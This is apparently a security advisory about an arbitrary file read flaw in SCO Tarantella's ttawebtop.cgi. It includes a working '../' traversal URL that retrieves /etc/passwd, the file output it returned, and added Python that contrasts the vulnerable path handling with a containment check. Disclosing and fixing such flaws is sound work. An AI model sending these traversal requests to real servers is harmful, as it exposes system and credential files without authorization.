ttawebtop.cgi read arbitrary files



Vulnerability

    ttawebtop.cgi

Affected

    Tarantella prior to 3.10

Description

    SCO Tarantella lets a remote user read files via the web:

        http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

        root:x:0:0:root:/root:/bin/bash
        bin:x:1:1:bin:/bin:
        daemon:x:2:2:daemon:/sbin:
        adm:x:3:4:adm:/var/adm:
        lp:x:4:7:lp:/var/spool/lpd:
        sync:x:5:0:sync:/sbin:/bin/sync
        shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
        halt:x:7:0:halt:/sbin:/sbin/
        ...

    No permission to read shadow, though:

        http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

        File missing
        The following file could not be found:
        /tarantella/../../../../../../../../../../../../../../../etc/shadow

    It is a problem for releases 3.00 and 3.01 only.

Solution

    This problem was introduced in release 3.01 and was caught during
    a security audit and was fixed for our last release (Tarantella
    3.10).
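
    The "File missing" message above shows the pg value appended to the
    /tarantella/ base path unchanged. The following is an added example (not
    Tarantella's code and not the vendor's fix) of the containment check a
    file-serving handler needs; BASE_DIR, the function names and the sample
    page name are assumptions.

```python
import os
from urllib.parse import parse_qs, urlsplit

# Assumed template root; the advisory's error message only shows that the
# pg value ends up appended to "/tarantella/".
BASE_DIR = "/tarantella"


def pg_from_url(url):
    """Return the percent-decoded pg parameter of a request URL ('' if absent)."""
    values = parse_qs(urlsplit(url).query).get("pg", [])
    return values[0] if values else ""


def naive_resolve(pg, base=BASE_DIR):
    """Behaviour implied by the error message: plain string concatenation."""
    return base + "/" + pg


def safe_resolve(pg, base=BASE_DIR):
    """Return the canonical path for pg, or None if it would leave base."""
    if "\x00" in pg or os.path.isabs(pg):
        return None
    # realpath collapses ".." segments and follows symlinks that exist on
    # disk, so the comparison is made on the path that would really be opened.
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, pg))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests modelled on the advisory's URL.
    samples = [
        "http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../etc/passwd",
        "http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=%2e%2e%2f%2e%2e%2fetc/passwd",
        "http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=help/index.html",
    ]
    for url in samples:
        pg = pg_from_url(url)
        print(f"{pg!r}: naive={naive_resolve(pg)} safe={safe_resolve(pg)}")
```

    The check runs on the decoded, canonicalised path rather than on the raw
    string, so percent-encoded ".." sequences are rejected as well.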

